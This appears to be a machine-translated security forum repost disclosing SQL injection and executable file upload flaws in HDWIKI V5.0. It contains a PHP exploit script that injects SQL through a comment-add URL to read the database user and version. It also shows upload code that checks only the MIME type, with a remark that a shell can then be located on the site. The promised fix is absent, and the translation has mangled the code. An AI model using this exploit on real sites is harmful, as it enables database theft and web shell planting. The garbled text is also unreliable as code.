Multiple SQL Injection Vulnerabilities in HDWIKI V5.0/Executable File Upload vulnerabilities and fixes

HDWIKI V5.0 basically does not filter input variables. Multiple SQL Injection Vulnerabilities exist.

Post the injection code of a comment location

<? Php
Error_reporting (7 );
Ini_set ('max _ execution_time ', 0 );

$ Host = $ argv [1];
$ Path = $ argv [2];
$ POSTDATA = 'comment = ddddddddddd & c_class = 0 & re_id = 0 & anonymity = 0 & code = undefined ';

Echo $ html = send ($ POSTDATA );

Function send ($ cmd ){
Global $ host, $ path;
$ Message = "POST $ path/index. php? Comment-add-2, (select/**/concat (user (), 0x5f, version (), 1, 1, 1 ), (1 HTTP/1.1 \ r \ n ";
$ Message. = "Accept: */* \ r \ n ";
$ Message. = "Referer:". $ host. "\ r \ n ";
$ Message. = "Accept-Language: zh-cn \ r \ n ";
$ Message. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) \ r \ n ";
$ Message. = "Host:". $ host. "\ r \ n ";
$ Message. = "Content-Length:". strlen ($ cmd). "\ r \ n ";
$ Message. = "Connection: Close \ r \ n ";
$ Message. = "Cookie: kaiyuan_tip_date = 2% 2C11; hd_sid = OBIyML; hd_auth = bandwidth % 2Be0Xofs % 2BfBr4E % 2Fj7Wh % bandwidth \ r \ n ";
$ Message. = $ cmd;

$ Fp = fsockopen ($ host, 80 );
Fputs ($ fp, $ message );

$ Resp = '';

While ($ fp &&! Feof ($ fp ))
$ Resp. = fread ($ fp, 1024 );

Return $ resp;
} Executable File Upload Vulnerability

Attachement. php file upload code

Function douploadimg (){
$ Imgname = $ _ FILES ['photofile'] ['name'];
$ Extname = file: extname ($ imgname );
$ Destfile = $ _ ENV ['attachment']-> makepath ($ extname );
$ Arrupload = file: uploadfile ($ _ FILES ['photofile'], $ destfile );
...... Several functions involved

Function extname ($ filename ){
$ Pathinfo = pathinfo ($ filename );
Return strtolower ($ pathinfo ['extension']);
}

Function makepath ($ extname, $ format = 'ym '){
Return 'uploads /'. gmdate ($ format, $ this-> base-> time + $ this-> base-> setting ['time _ offset ']). "/{$ this-> base-> time }". util: random (8 ). '. '. strtolower ($ extname );
}

Function uploadfile ($ attachment, $ target, $ maxsize = 1024, $ is_image = 1 ){
$ Result = array ('result' => false, 'msg '=> 'upload mistake ');
If ($ is_image ){
$ Attach = $ attachment;
$ Filesize = $ attach ['SIZE']/1024;
If (0 = $ filesize ){
$ Result ['msg '] =' & #19978; & #20256; & #38169; & #35823 ;';
Return $ result;
}
If (substr ($ attach ['type'], 0, 6 )! = 'Image/') {// the file type is determined by type only.
$ Result ['msg '] =' & #26684; & #24335; & #38169; & #35823 ;';
Return $ result;
}
If ($ filesize> $ maxsize ){
$ Result ['msg '] =' & #25991; & #20214; & #36807; & #22823 ;';
Return $ result;
}
} Else {
$ Attach ['tmp _ name'] = $ attachment;
}
$ Filedir = dirname ($ target );
File: forcemkdir ($ filedir );
If (@ copy ($ attach ['tmp _ name'], $ target) | @ move_uploaded_file ($ attach ['tmp _ name'], $ target )){
$ Result ['result'] = true;
$ Result ['msg '] =' & #19978; & #20256; & #25104; & #21151 ;';
}
......
}

After uploading, you can see the shell address in image encyclopedia.

From http://bbs.wolvez.org/viewtopic.php? Id = 208

Www.2cto.com:

Code Filtering for the above problems